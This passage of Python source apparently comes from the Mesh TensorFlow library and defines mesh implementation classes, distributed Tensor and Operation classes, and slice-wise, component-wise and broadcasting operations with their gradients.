mtf.LayoutRules([(\"batch\", \"batch\"),\n (\"d_ff\", \"model\"),\n (\"heads\", \"model\")])\n mesh_impl = mtf.MeshImpl(shape=shape, layout_rules=layout_rules)\n ```\n \"\"\"\n\n def __init__(self, shape, layout_rules):\n \"\"\"Creates a mesh implementation.\n\n Args:\n shape: Shape.\n layout_rules: LayoutRules.\n \"\"\"\n self._shape = convert_to_shape(shape)\n self._layout_rules = convert_to_layout_rules(layout_rules)\n\n @property\n def shape(self):\n return self._shape\n\n @property\n def ndims(self):\n return len(self._shape)\n\n @property\n def layout_rules(self):\n return self._layout_rules\n\n @property\n def size(self):\n return self.shape.size\n\n @property\n def supports_control_dependencies(self):\n return True\n\n def tensor_dimension_to_mesh_axis(self, tensor_dimension):\n \"\"\"Mesh axis associated with tensor dimension (or None).\n\n Args:\n tensor_dimension: Dimension.\n\n Returns:\n int or None.\n \"\"\"\n return self.layout_rules.tensor_dimension_to_mesh_axis(\n tensor_dimension, self.shape)\n\n def tensor_layout(self, arg):\n \"\"\"Compute TensorLayout for a Tensor or a Shape.\n\n Args:\n arg: Tensor or Shape.\n\n Returns:\n TensorLayout.\n \"\"\"\n if isinstance(arg, Tensor):\n arg = arg.shape\n return self.layout_rules.tensor_layout(arg, self.shape)\n\n def mesh_axis_to_cumprod(self, tensor_shape):\n \"\"\"For each mesh axis, give the product of previous tensor axes.\n\n Args:\n tensor_shape: Shape.\n\n Returns:\n list with length self.ndims where each element is an integer or None.\n \"\"\"\n tensor_layout = self.tensor_layout(tensor_shape)\n ma2ta = tensor_layout.mesh_axis_to_tensor_axis(self.ndims)\n ta2cumprod = tensor_shape.cumprod\n return [None if ta is None else ta2cumprod[ta] for ta in ma2ta]\n\n def slice_shape(self, tensor_shape):\n \"\"\"Shape of each slice of the Tensor.\n\n Args:\n tensor_shape: Shape.\n\n Returns:\n list of integers with length tensor_shape.ndims.\n\n Raises:\n ValueError: If a Tensor dimension is not divisible by the corresponding\n Mesh dimension.\n \"\"\"\n tensor_layout = self.tensor_layout(tensor_shape)\n ret = []\n for tensor_dim, mesh_axis in zip(\n tensor_shape, tensor_layout.tensor_axis_to_mesh_axis):\n if mesh_axis is None:\n ret.append(tensor_dim.size)\n else:\n mesh_dim = self.shape[mesh_axis]\n if tensor_dim.size % mesh_dim.size != 0:\n raise ValueError(\n \"Tensor dimension size not divisible by mesh dimension size:\"\n \" tensor_shape=%s tensor_layout=%s\"\n % (tensor_shape, tensor_layout))\n ret.append(tensor_dim.size // mesh_dim.size)\n return ret\n\n def slice_begin(self, tensor_shape, pnum):\n \"\"\"Begin position for the tensor slice for the given processor.\n\n Args:\n tensor_shape: Shape.\n pnum: int <= self.size.\n\n Returns:\n list of integers with length tensor_shape.ndims.\n \"\"\"\n tensor_layout = self.tensor_layout(tensor_shape)\n coordinates = pnum_to_processor_coordinates(self.shape, pnum)\n ret = []\n for dim_size, mesh_axis in zip(\n tensor_shape.to_integer_list, tensor_layout.tensor_axis_to_mesh_axis):\n if mesh_axis is None:\n ret.append(0)\n else:\n ret.append(\n dim_size // self.shape[mesh_axis].size * coordinates[mesh_axis])\n return ret\n\n def laid_out_size(self, tensor_shape):\n \"\"\"Total size of all slices.\n\n Args:\n tensor_shape: Shape.\n\n Returns:\n int.\n \"\"\"\n return list_product(self.slice_shape(tensor_shape)) * self.size\n\n def slicewise(self, fn, *inputs):\n \"\"\"Executes a function in parallel on all slices.\n\n Args:\n fn: function from tf.Tensors to tf.Tensor or a tuple of tf.Tensors.\n *inputs: list of inputs. Each input is either a LaidOutTensor or\n is convertible to a tf.Tensor.\n\n Returns:\n LaidOutTensor, or a tuple of LaidOutTensors if fn returns a tuple.\n \"\"\"\n raise NotImplementedError(\"Slicewise not implemented\")\n\n def Print(self, x, data, message, **kwargs): # pylint: disable=invalid-name\n \"\"\"Calls tf.Print.\n\n Args:\n x: LaidOutTensor.\n data: list of LaidOutTensor.\n message: str.\n **kwargs: keyword arguments to tf.print.\n\n Returns:\n LaidOutTensor.\n \"\"\"\n del data, message, kwargs\n tf.logging.warning(\"Warning - mtf.Print not implemented for this mesh type\")\n return x\n\n def allreduce(self, x, mesh_axes, reduction_fn_string):\n \"\"\"Grouped allreduce, (summed across the given dimensions).\n\n Args:\n x: LaidOutTensor.\n mesh_axes: list of integers, the mesh dimensions to be reduced.\n reduction_fn_string: \"SUM\" or \"MAX\".\n\n Returns:\n LaidOutTensor.\n \"\"\"\n raise NotImplementedError(\"Allreduce not implemented\")\n\n def allsplit(self, x, mesh_axis, split_axis, which=None):\n \"\"\"Inverse of allconcat - split each slice and keep only one piece of it.\n\n The number of ways to split is the number of processors in the group.\n The part that is kept corresponds to the processor's index in the group.\n\n Args:\n x: LaidOutTensor.\n mesh_axis: int, the mesh axis along which to split.\n split_axis: int, the Tensor axis along which to split.\n which: an optional LaidOutTensor of integer scalars. Selects the slice to\n to keep, instead of the coordinate.\n\n Returns:\n LaidOutTensor.\n \"\"\"\n if which is None:\n which = self.laid_out_pcoord(mesh_axis)\n num_splits = self.shape[mesh_axis].size\n def my_fn(x, which):\n slice_begin = [\n dimsize // num_splits * which if i == split_axis\n else 0 for i, dimsize in enumerate(x.shape.as_list())]\n slice_size = [\n dimsize // num_splits if i == split_axis\n else dimsize for i, dimsize in enumerate(x.shape.as_list())]\n return tf.slice(x, slice_begin, slice_size)\n return self.slicewise(my_fn, x, which)\n\n def allconcat(self, x, mesh_axis, concat_axis):\n \"\"\"Grouped allconcat (like MPI allgather followed by concat).\n\n Args:\n x: LaidOutTensor.\n mesh_axis: int, the mesh axis along which to group.\n concat_axis: int, the Tensor axis along which to concatenate.\n\n Returns:\n LaidOutTensor.\n \"\"\"\n raise NotImplementedError(\"Allconcat not implemented\")\n\n def alltoall(self, x, mesh_axis, split_axis, concat_axis):\n \"\"\"Grouped alltoall (like MPI alltoall with splitting and concatenation).\n\n Args:\n x: LaidOutTensor.\n mesh_axis: int, the mesh axis along which to group.\n split_axis: int, the Tensor axis along which to split.\n concat_axis: int, the Tensor axis along which to concatenate.\n\n Returns:\n LaidOutTensor.\n \"\"\"\n raise NotImplementedError(\"Alltoall not implemented\")\n\n def receive(self, x, mesh_axis, source_pcoord):\n \"\"\"Collective receive in groups.\n\n Each group contains the processors that differ only in mesh_axis.\n\n ```python\n group_size = self.shape[mesh_axis].size\n ```\n\n Args:\n x: a LaidOutTensor\n mesh_axis: an integer\n source_pcoord: a list of optional integers. Each element is either None\n or an integer in [0, group_size). If source_pcoord[k] is None, then the\n output for the k-th processor in each group is a zero tensor. If\n source_pcoord[k] is not None, then the output for the k-th processor in\n each group is equal to the input for the source_pcoord[k]-th processor\n in that group.\n\n Returns:\n a LaidOutTensor\n \"\"\"\n raise NotImplementedError(\"Alltoall not implemented\")\n\n def shift_by_n_processors(self, x, mesh_axis, offset, wrap):\n \"\"\"Receive the slice from processor pcoord - offset.\n\n Args:\n x: a LaidOutTensor\n mesh_axis: an integer\n offset: an integer\n wrap: a boolean. If True, then wrap around. Otherwise, pad with zeros.\n \"\"\"\n n = self.shape[mesh_axis].size\n source_pcoord = []\n for i in xrange(n):\n c = i - offset\n if c != c % n:\n if wrap:\n c = c % n\n else:\n c = None\n source_pcoord.append(c)\n return self.receive(x, mesh_axis, source_pcoord)\n\n def laid_out_pnum(self):\n \"\"\"Returns a LaidOutTensor containing the processor number.\n\n Returns:\n LaidOutTensor where each slice is an integer scalar.\n \"\"\"\n raise NotImplementedError(\"laid_out_pnum not implemented\")\n\n def laid_out_pcoord(self, mesh_axis):\n \"\"\"Returns a LaidOutTensor containing the processor coordinate.\n\n Args:\n mesh_axis: int.\n\n Returns:\n LaidOutTensor where each slice is an integer scalar.\n \"\"\"\n divisor = list_product(self.shape.to_integer_list[mesh_axis + 1:])\n modulus = self.shape[mesh_axis].size\n def my_fn(pnum):\n return (pnum // divisor) % modulus\n return self.slicewise(my_fn, self.laid_out_pnum())\n\n def broadcast_impl(self, old_slices, old_shape, new_shape):\n \"\"\"Implementation of a broadcast operation.\n\n Args:\n old_slices: LaidOutTensor.\n old_shape: Shape.\n new_shape: Shape.\n\n Returns:\n LaidOutTensor.\n \"\"\"\n new_slice_shape = self.slice_shape(new_shape)\n def tf_fn(x):\n return (tf.zeros(new_slice_shape, dtype=x.dtype) +\n _expand_dims(x, old_shape, new_shape))\n return self.slicewise(tf_fn, old_slices)\n\n def make_slices(self, tf_tensor, tensor_shape):\n \"\"\"Turns a single tf.Tensor into a list of slices, one for each processor.\n\n Args:\n tf_tensor: tf.Tensor.\n tensor_shape: Shape.\n\n Returns:\n list of tf.tensor with length self.size.\n \"\"\"\n tensor_layout = self.tensor_layout(tensor_shape)\n slice_shape = self.slice_shape(tensor_shape)\n def my_fn(pnum):\n if tensor_layout.is_fully_replicated:\n return tf_tensor\n else:\n slice_begin = self.slice_begin(tensor_shape, pnum)\n return tf.slice(tf_tensor, slice_begin, slice_shape)\n\n return parallel([tf_tensor.device] * self.size, my_fn,\n list(xrange(self.size)))\n\n def combine_slices(self, slices, tensor_shape, device=None):\n \"\"\"Turns a set of slices into a single tensor.\n\n Args:\n slices: list of tf.Tensor with length self.size.\n tensor_shape: Shape.\n device: optional str. If absent, we use the devices of the slices.\n\n Returns:\n tf.Tensor.\n \"\"\"\n if tensor_shape.ndims == 0:\n return slices[0]\n\n ret = slices[:]\n tensor_layout = self.tensor_layout(tensor_shape)\n for mesh_dim, tensor_axis in zip(\n self.shape, tensor_layout.mesh_axis_to_tensor_axis(self.ndims)):\n slice_size = len(ret) // mesh_dim.size\n if tensor_axis is None:\n ret = ret[:slice_size]\n else:\n if device:\n devices = [device] * slice_size\n else:\n devices = [ret[i].device for i in xrange(slice_size)]\n concat_inputs = [[ret[i + slice_size * j]\n for j in xrange(mesh_dim.size)]\n for i in xrange(slice_size)]\n ret = parallel(\n devices, tf.concat, concat_inputs,\n axis=[tensor_axis] * len(devices))\n assert len(ret) == 1\n return ret[0]\n\n def export_to_tf_tensor(self, x, laid_out_x):\n \"\"\"Turns a Tensor into a tf.Tensor.\n\n Args:\n x: Tensor.\n laid_out_x: LaidOutTensor.\n\n Returns:\n tf.Tensor.\n \"\"\"\n raise NotImplementedError(\"export_to_tf_tensor not implemented\")\n\n def import_tf_tensor(self, x, tf_x):\n \"\"\"Imports a tf.Tensor, producing a LaidOutTensor.\n\n Args:\n x: Tensor.\n tf_x: tf.Tensor.\n\n Returns:\n LaidOutTensor.\n \"\"\"\n raise NotImplementedError(\"Import not implemented\")\n\n\nclass LazyAllreduceSum(object):\n \"\"\"Represents a LaidOutTensor with a lazy allreduce.\n\n The purpose of delaying allreduce is that it saves bandwidth to first add\n and then allreduce, as opposed to the other way around.\n \"\"\"\n\n def __init__(self,\n mesh_impl,\n laid_out_input,\n mesh_axes,\n add_counter_fn=None):\n \"\"\"Create a LazyAllreduceSum.\n\n Args:\n mesh_impl: a mesh_impl\n laid_out_input: a LaidOutTensor\n mesh_axes: a list of mesh axes\n add_counter_fn: a function taking no arguments which calls\n lowering.add_counter if and when the allreduce executes.\n Returns:\n a LazyAllreduceSum\n \"\"\"\n self.mesh_impl = mesh_impl\n self.laid_out_input = laid_out_input\n self.mesh_axes = mesh_axes\n self._add_counter_fn = add_counter_fn\n self._reduced = None\n\n def to_laid_out_tensor(self):\n if not self._reduced:\n self._reduced = self.mesh_impl.allreduce(\n self.laid_out_input, self.mesh_axes, \"SUM\")\n if self._add_counter_fn:\n self._add_counter_fn()\n return self._reduced\n\n def __add__(self, other):\n \"\"\"Add to another LazyAllreduceSum.\n\n Args:\n other: a LazyAllreduceSum or a LaidOutTensor\n Returns:\n a LazyAllreduceSum or a LaidOutTensor\n \"\"\"\n if (isinstance(other, LazyAllreduceSum) and\n self.mesh_impl == other.mesh_impl and\n self.mesh_axes == other.mesh_axes):\n return LazyAllreduceSum(\n self.mesh_impl,\n self.mesh_impl.slicewise(\n tf.add, self.laid_out_input, other.laid_out_input),\n self.mesh_axes,\n add_counter_fn=self._add_counter_fn)\n else:\n return self.mesh_impl.slicewise(\n tf.add, self.to_laid_out_tensor(), other.to_laid_out_tensor())\n\n @property\n def slice_shape(self):\n return self.laid_out_input.slice_shape\n\n\ndef convert_args_to_laid_out_tensors(xs):\n \"\"\"Convert list elements to laid-out-tensors when possible.\n\n Args:\n xs: a list\n Returns:\n a list\n \"\"\"\n ret = []\n for x in xs:\n try:\n ret.append(x.to_laid_out_tensor())\n except AttributeError:\n ret.append(x)\n return ret\n\n\nclass Tensor(object):\n \"\"\"A Distributed Tensor.\"\"\"\n\n def __init__(self, operation, shape, dtype, name=None):\n if not isinstance(shape, Shape):\n raise ValueError(\"shape must be a Shape got %s\" % shape.to_string)\n if not isinstance(dtype, tf.DType):\n raise ValueError(\"dtype must be a tf.DType got %s\" % dtype)\n self._mesh = operation.mesh\n self._operation = operation\n self._shape = shape\n self._dtype = dtype\n if name is None:\n name = self.operation.name\n self._name = name\n self._mesh.graph.tensors.append(self)\n\n @property\n def shape(self):\n return self._shape\n\n @property\n def size(self):\n return self.shape.size\n\n @property\n def mesh(self):\n return self._mesh\n\n @property\n def graph(self):\n return self._mesh.graph\n\n @property\n def operation(self):\n return self._operation\n\n @property\n def dtype(self):\n return self._dtype\n\n @property\n def name(self):\n return self._name\n\n def __repr__(self):\n return self.to_string\n\n def __add__(self, other):\n return add(self, other)\n\n def __radd__(self, other):\n return add(self, other)\n\n def __sub__(self, other):\n return sub(self, other)\n\n def __rsub__(self, other):\n return sub(other, self)\n\n def __mul__(self, other):\n return multiply(self, other)\n\n def __rmul__(self, other):\n return multiply(self, other)\n\n def __neg__(self):\n return negative(self)\n\n def __truediv__(self, other):\n return divide(self, other)\n\n def __rtruediv__(self, other):\n return divide(other, self)\n\n def __floordiv__(self, other):\n return floordiv(self, other)\n\n def __rfloordiv__(self, other):\n return floordiv(other, self)\n\n def __mod__(self, other):\n return mod(self, other)\n\n def __rmod__(self, other):\n return mod(other, self)\n\n @property\n def to_string(self):\n return \"Tensor[%s, %s, %s]\" % (self.name, self.shape.to_string, self.dtype)\n\n\nclass Operation(object):\n \"\"\"A Distributed Operation.\"\"\"\n\n def __init__(self, inputs, mesh=None, name=None):\n if mesh is None:\n if not inputs:\n raise ValueError(\"mesh must be specified if no inputs\")\n mesh = inputs[0].mesh\n self._inputs = inputs\n self._outputs = []\n self._mesh = mesh\n assert name is not None\n scope_name = tf.get_variable_scope().name\n if scope_name:\n name = scope_name + \"/\" + name\n self._name = name\n mesh.graph.operations.append(self)\n\n @property\n def graph(self):\n return self._mesh.graph\n\n @property\n def mesh(self):\n return self._mesh\n\n @property\n def name(self):\n return self._name\n\n @property\n def inputs(self):\n return self._inputs[:]\n\n @property\n def outputs(self):\n return self._outputs[:]\n\n @property\n def to_string(self):\n return \"%s[Inputs=(%s) Outputs=(%s)]\" % (\n type(self).__name__,\n \", \".join([t.to_string for t in self.inputs]),\n \", \".join([t.to_string for t in self.outputs]))\n\n @property\n def has_gradient(self):\n return (\n [t for t in self.inputs if t.dtype.is_floating] and\n [t for t in self.outputs if t.dtype.is_floating])\n\n def gradient(self, unused_grad_ys):\n raise NotImplementedError(\"Gradient not implemented\")\n\n def lower(self, lowering):\n raise NotImplementedError(\"Lower not implemented\")\n\n\nclass SlicewiseOperation(Operation):\n \"\"\"Apply any tensorflow function slice-wise.\n\n Calls the Tensorflow function on each slice of the inputs to produce the\n corresponding slice of the outputs. Gradients are computed through\n tensorflow.\n\n The user must specify \"splittable_dims\": a list of Dimensions which can\n be split while still keeping this computation valid. For example, for\n component-wise functions, all the dimensions are splittable, but if the\n function is a reduction, the reduced dimensions are not splittable.\n \"\"\"\n\n def __init__(self,\n tf_fn,\n inputs,\n output_shape,\n output_dtype,\n splittable_dims,\n grad_function=None,\n name=None):\n \"\"\"Create a SlicewiseOperation.\n\n grad_function is a python function taking this operation and a gradients\n Tensor and producing input gradients tensors.\n e.g.\n def _square_grad(op, dy):\n return [dy * op.inputs[0] * 2]\n\n Args:\n tf_fn: a function taking n tf.Tensors and returning a tf.Tensor\n inputs: a list of n Tensors\n output_shape: a Shape\n output_dtype: a dtype\n splittable_dims: a list of Dimensions which are ok to split\n grad_function: an optional python function. Default to using tf.gradients\n name: an optional string\n \"\"\"\n super(SlicewiseOperation, self).__init__(inputs, name=name or \"slicewise\")\n self._tf_fn = tf_fn\n self._outputs = [Tensor(self, output_shape, output_dtype)]\n self._splittable_dims = splittable_dims\n self._grad_function = grad_function\n\n def gradient(self, grad_ys):\n if self._grad_function is not None:\n return self._grad_function(self, grad_ys[0])\n return GenericGradOperation(self, grad_ys).outputs\n\n def lower(self, lowering):\n # Check that only splittable dims are split\n mesh_impl = lowering.mesh_impl(self)\n for t in self.inputs + self.outputs:\n layout = mesh_impl.tensor_layout(t)\n for d, mesh_axis in zip(t.shape.dims, layout.tensor_axis_to_mesh_axis):\n if mesh_axis is not None and d not in self._splittable_dims:\n raise ValueError(\"dimension %s is not declared as splittable\" % d)\n lowering.set_tensor_lowering(\n self.outputs[0],\n mesh_impl.slicewise(\n self._tf_fn, *[lowering.tensors[x] for x in self.inputs]))\n\n\ndef slicewise(tf_fn,\n xs,\n output_shape=None,\n output_dtype=None,\n splittable_dims=None,\n grad_function=None,\n name=None):\n \"\"\"Slice-wise call to any tensorflow function.\n\n The output shape and dtype default to those of the first input.\n splittable_dims is a list of Dimensions which can be split while keeping the\n computation valid.\n\n Args:\n tf_fn: a function taking n tf.Tensors and returning a tf.Tensor\n xs: a list of n Tensors\n output_shape: a Shape\n output_dtype: a dtype\n splittable_dims: a list of Dimensions which are ok to split\n grad_function: an optional gradients function. If None, use tf gradient.\n name: an optional string\n\n Returns:\n a Tensor\n \"\"\"\n return SlicewiseOperation(\n tf_fn,\n xs,\n convert_to_shape(output_shape) or xs[0].shape,\n output_dtype or xs[0].dtype,\n splittable_dims,\n grad_function,\n name=name).outputs[0]\n\n\ndef cwise(tf_fn, xs, output_dtype=None, grad_function=None, name=None):\n \"\"\"Component-wise operation with no broadcasting.\n\n Args:\n tf_fn: a component-wise function taking n tf.Tensor inputs and producing\n a tf.Tensor output\n xs: n Tensors\n output_dtype: an optional dtype\n grad_function: an optional python function\n name: an optional string\n\n Returns:\n a Tensor\n \"\"\"\n return slicewise(\n tf_fn, xs, output_dtype=output_dtype, splittable_dims=xs[0].shape.dims,\n grad_function=grad_function, name=name or \"cwise\")\n\n\ndef square(x, name=\"square\"):\n return cwise(\n tf.square, [x], name=name,\n grad_function=lambda op, dy: [dy * op.inputs[0] * 2])\n\n\ndef sqrt(x, name=\"sqrt\"):\n return cwise(\n tf.sqrt, [x], name=name,\n grad_function=lambda op, dy: [dy * 0.5 / op.outputs[0]])\n\n\ndef _rsqrt_grad(op, dy):\n return [dy * -0.5 * op.outputs[0] * op.outputs[0] * op.outputs[0]]\n\n\ndef rsqrt(x, name=\"rsqrt\"):\n return cwise(\n tf.rsqrt, [x], name=name, grad_function=_rsqrt_grad)\n\n\ndef log(x, name=\"log\"):\n return cwise(\n tf.log, [x], name=name,\n grad_function=lambda op, dy: [dy / op.inputs[0]])\n\n\ndef exp(x, name=\"exp\"):\n return cwise(tf.exp, [x], name=name,\n grad_function=lambda op, dy: [dy * op.outputs[0]])\n\n\ndef sigmoid(x, name=\"sigmoid\"):\n def grad_function(op, dy):\n y = op.outputs[0]\n return [y * (1.0 - y) * dy]\n return cwise(tf.sigmoid, [x], name=name, grad_function=grad_function)\n\n\ndef tanh(x, name=\"tanh\"):\n def grad_function(op, dy):\n y = op.outputs[0]\n return [(1.0 - square(y)) * dy]\n return cwise(tf.tanh, [x], name=name, grad_function=grad_function)\n\n\ndef pow(x, y): # pylint: disable=redefined-builtin\n return exp(log(x) * y)\n\n\ndef negative(x, name=\"negative\"):\n return cwise(tf.negative, [x], name=name,\n grad_function=lambda op, dy: [negative(dy)])\n\n\ndef logical_not(x, name=\"logical_not\"):\n return cwise(tf.logical_not, [x], name=name)\n\n\ndef reciprocal(x, name=\"reciprocal\"):\n return cwise(\n tf.reciprocal, [x], name=name,\n grad_function=lambda op, dy: [negative(dy * square(op.outputs[0]))])\n\n\ndef _relu_grad(op, dy):\n return [dy * cast(greater(op.inputs[0], 0), op.inputs[0].dtype)]\n\n\ndef relu(x, name=\"relu\"):\n return cwise(tf.nn.relu, [x], name=name, grad_function=_relu_grad)\n\n\ndef cast(x, dtype, name=\"cast\"):\n if dtype == x.dtype:\n return x\n return cwise(\n lambda x: tf.cast(x, dtype), [x], output_dtype=dtype, name=name,\n grad_function=lambda op, dy: [cast(dy, op.inputs[0].dtype)])\n\n\ndef to_float(x, name=\"to_float\"):\n return cast(x, tf.float32, name=name)\n\n\ndef to_int32(x, name=\"to_int32\"):\n return cast(x, tf.int32, name=name)\n\n\nclass GenericGradOperation(Operation):\n \"\"\"Gradients that follow regular TF.\n\n Calling tf.gradients multiple times seems really slow in python.\n TODO(noam): can we speed this up using functions or some other method?\n \"\"\"\n\n def __init__(self, forward_op, grad_ys, name=None):\n # tf.logging.info(\"forward inp %s, operations %s, grad_ys: %s\",\n # forward_op.inputs, forward_op.outputs, grad_ys)\n super(GenericGradOperation, self).__init__(\n forward_op.inputs + forward_op.outputs + grad_ys,\n name=name or \"generic_grad\")\n self._grad_ys = grad_ys\n self._forward_op = forward_op\n self._outputs = [Tensor(self, x.shape, x.dtype) for x in forward_op.inputs]\n\n def lower(self, lowering):\n # lists of lists of tf.Tensor\n all_ys = transpose_list_of_lists(\n [lowering.tensors[y].tensor_list for y in self._forward_op.outputs])\n all_xs = transpose_list_of_lists(\n [lowering.tensors[x].tensor_list for x in self._forward_op.inputs])\n all_grad_ys = transpose_list_of_lists(\n [lowering.tensors[dy].tensor_list for dy in self._grad_ys])\n all_grad_xs = [tf.gradients(ys=ys, xs=xs, grad_ys=grad_ys) for\n ys, xs, grad_ys in zip(all_ys, all_xs, all_grad_ys)]\n grad_xs = transpose_list_of_lists(all_grad_xs)\n for out, grad_x in zip(self.outputs, grad_xs):\n lowering.set_tensor_lowering(\n out,\n lowering.mesh_impl(self).LaidOutTensor.from_tensor_list(grad_x))\n\n\nclass ScalarMultiplyOperation(Operation):\n \"\"\"Multiply by a tf Scalar (no backprop to scalar).\"\"\"\n\n def __init__(self, x, scalar, name=None):\n super(ScalarMultiplyOperation, self).__init__(\n [x], name=name or \"scalar_mul\")\n self._outputs = [Tensor(self, x.shape, x.dtype)]\n self._scalar = scalar\n\n def gradient(self, grad_ys):\n dy = grad_ys[0]\n return [dy * self._scalar]\n\n def lower(self, lowering):\n lowering.set_tensor_lowering(\n self.outputs[0],\n lowering.mesh_impl(self).slicewise(\n lambda x: x * self._scalar, lowering.tensors[self.inputs[0]]))\n\n\nclass ScalarAddOperation(Operation):\n \"\"\"Add a tf Scalar (no backprop to scalar).\"\"\"\n\n def __init__(self, x, scalar, name=None):\n super(ScalarAddOperation, self).__init__([x], name=name or \"scalar_add\")\n self._outputs = [Tensor(self, x.shape, x.dtype)]\n self._scalar = scalar\n\n def gradient(self, grad_ys):\n return grad_ys\n\n def lower(self, lowering):\n lowering.set_tensor_lowering(\n self.outputs[0],\n lowering.mesh_impl(self).slicewise(\n lambda x: x + self._scalar, lowering.tensors[self.inputs[0]]))\n\n\nclass BinaryOpWithBroadcasting(Operation):\n \"\"\"Binary operation with broadcasting.\"\"\"\n\n def __init__(self, tf_fn, x1, x2, output_shape, output_dtype, name=None):\n super(BinaryOpWithBroadcasting, self).__init__(\n [x1, x2], name=name or \"binary_op\")\n assert isinstance(output_dtype, tf.DType)\n self._outputs = [Tensor(self, output_shape, output_dtype)]\n self._tf_fn = tf_fn\n\n def gradient(self, unused_grad_ys):\n raise ValueError(\"Gradient not implememnted\")\n\n def lower(self, lowering):\n x1 = self.inputs[0]\n x2 = self.inputs[1]\n output = self.outputs[0]\n laid_out_x1 = lowering.tensors[x1]\n laid_out_x2 = lowering.tensors[x2]\n mesh_impl = lowering.mesh_impl(self)\n if x1.shape != output.shape:\n laid_out_x1 = mesh_impl.slicewise(\n _expand_dims, laid_out_x1, x1.shape, output.shape)\n if x2.shape != output.shape:\n laid_out_x2 = mesh_impl.slicewise(\n _expand_dims, laid_out_x2, x2.shape, output.shape)\n lowering.set_tensor_lowering(\n self.outputs[0],\n mesh_impl.slicewise(\n self._tf_fn, laid_out_x1, laid_out_x2))\n\n\ndef binary_arguments_to_tensors(x1, x2):\n \"\"\"Convert argument of a binary operation to Tensors.\n\n Args:\n x1: a Tensor or something convertible to a tf Scalar\n x2: a Tensor or something convertible to a tf Scalar\n\n Returns:\n new_x1: a Tensor\n new_x2: a Tensor\n\n Raises:\n ValueError: on failure\n \"\"\"\n if not isinstance(x1, Tensor) and not isinstance(x2, Tensor):\n raise ValueError(\"at least one of x1 and x2 must be an mtf Tensor\")\n elif isinstance(x1, Tensor) and isinstance(x2, Tensor):\n return x1, x2\n elif isinstance(x1, Tensor):\n return x1, import_tf_tensor(\n x1.mesh, tf.convert_to_tensor(x2, dtype=x1.dtype), Shape([]))\n else:\n return import_tf_tensor(x2.mesh, tf.convert_to_tensor(x1, dtype=x2.dtype),\n Shape([])), x2\n\n\ndef binary_op_with_broadcasting(\n tf_fn, x1, x2, output_shape=None, output_dtype=None):\n x1, x2 = binary_arguments_to_tensors(x1, x2)\n output_shape = _infer_binary_broadcast_shape(x1.shape, x2.shape, output_shape)\n output_dtype = output_dtype or x1.dtype\n assert isinstance(output_dtype, tf.DType)\n return BinaryOpWithBroadcasting(\n tf_fn, x1, x2, convert_to_shape(output_shape),\n output_dtype).outputs[0]\n\n\ndef less(x1, x2, output_shape=None):\n return binary_op_with_broadcasting(\n tf.less, x1, x2, output_dtype=tf.bool, output_shape=output_shape)\n\n\ndef greater(x1, x2, output_shape=None):\n return binary_op_with_broadcasting(\n tf.greater, x1, x2, output_dtype=tf.bool, output_shape=output_shape)\n\n\ndef less_equal(x1, x2, output_shape=None):\n return binary_op_with_broadcasting(\n tf.less_equal, x1, x2, output_dtype=tf.bool, output_shape=output_shape)\n\n\ndef greater_equal(x1, x2, output_shape=None):\n return binary_op_with_broadcasting(\n tf.greater_equal, x1, x2, output_dtype=tf.bool, output_shape=output_shape)\n\n\ndef equal(x1, x2, output_shape=None):\n return binary_op_with_broadcasting(\n tf.equal, x1, x2, output_dtype=tf.bool, output_shape=output_shape)\n\n\ndef not_equal(x1, x2, output_shape=None):\n return binary_op_with_broadcasting(\n tf.not_equal, x1, x2, output_dtype=tf.bool, output_shape=output_shape)\n\n\ndef logical_and(x1, x2, output_shape=None):\n return binary_op_with_broadcasting(\n tf.logical_and, x1, x2, output_dtype=tf.bool, output_shape=output_shape)\n\n\ndef logical_or(x1, x2, output_shape=None):\n return binary_op_with_broadcasting(\n tf.logical_or, x1, x2, output_dtype=tf.bool, output_shape=output_shape)\n\n\ndef floordiv(x1, x2, output_shape=None):\n output_dtype = x1.dtype if isinstance(x1, Tensor) else x2.dtype\n return binary_op_with_broadcasting(\n tf.floordiv, x1, x2, output_dtype=output_dtype, output_shape=output_shape)\n\n\ndef mod(x1, x2, output_shape=None):\n output_dtype = x1.dtype if isinstance(x1, Tensor) else x2.dtype\n return binary_op_with_broadcasting(\n tf.mod, x1, x2, output_dtype=output_dtype, output_shape=output_shape)\n\n\nclass AddOperation(BinaryOpWithBroadcasting):\n \"\"\"Binary addition with broadcasting.\"\"\"\n\n def __init__(self, x1, x2, output_shape, name=None):\n super(AddOperation, self).__init__(\n tf.add, x1, x2, output_shape, x1.dtype, name=name or \"add\")\n if x1.dtype != x2.dtype:\n raise ValueError(\"Dtypes must be equal.\")\n\n def gradient(self, grad_ys):\n dy = grad_ys[0]\n return [reduce_sum(dy, output_shape=self.inputs[0].shape),\n reduce_sum(dy, output_shape=self.inputs[1].shape)]\n\n\nclass MinMaxOperation(BinaryOpWithBroadcasting):\n \"\"\"Binary minimum/maximum with broadcasting.\"\"\"\n\n def __init__(self, tf_fn, x1, x2, output_shape, name=None):\n super(MinMaxOperation, self).__init__(\n tf_fn, x1, x2, output_shape, x1.dtype, name=name or \"add\")\n if x1.dtype != x2.dtype:\n raise ValueError(\"Dtypes must be equal.\")\n\n def gradient(self, grad_ys):\n dy = grad_ys[0]\n return [dy * cast(equal(self.inputs[0], self.outputs[0]), dy.dtype),\n dy * cast(equal(self.inputs[1], self.outputs[0]), dy.dtype)]\n\n\ndef minimum(x1, x2, output_shape=None, name=None):\n \"\"\"Binary minimum with broadcsting.\n\n Args:\n x1: a Tensor\n x2: a Tensor\n output_shape: an optional Shape\n name: an optional string\n Returns:\n a Tensor\n \"\"\"\n output_shape = convert_to_shape(output_shape)\n with tf.name_scope(name, default_name=\"minimum\"):\n x1, x2 = binary_arguments_to_tensors(x1, x2)\n return MinMaxOperation(\n tf.minimum, x1, x2, output_shape=_infer_binary_broadcast_shape(\n x1.shape, x2.shape, output_shape)).outputs[0]\n\n\ndef maximum(x1, x2, output_shape=None, name=None):\n \"\"\"Binary maximum with broadcsting.\n\n Args:\n x1: a Tensor\n x2: a Tensor\n output_shape: an optional Shape\n name: an optional string\n Returns:\n a Tensor\n \"\"\"\n output_shape = convert_to_shape(output_shape)\n with tf.name_scope(name, default_name=\"maximum\"):\n x1, x2 = binary_arguments_to_tensors(x1, x2)\n return MinMaxOperation(\n tf.maximum, x1, x2, output_shape=_infer_binary_broadcast_shape(\n x1.shape, x2.shape, output_shape)).outputs[0]\n\n\nclass BroadcastOperation(Operation):\n \"\"\"Broadcast - output dims are a superset of input dims, in any order.\"\"\"\n\n def __init__(self, x, output_shape, name=None):\n super(BroadcastOperation, self).__init__([x], name=name or \"broadcast\")\n self._outputs = [Tensor(self, output_shape, x.dtype)]\n\n def gradient(self, grad_ys):\n return 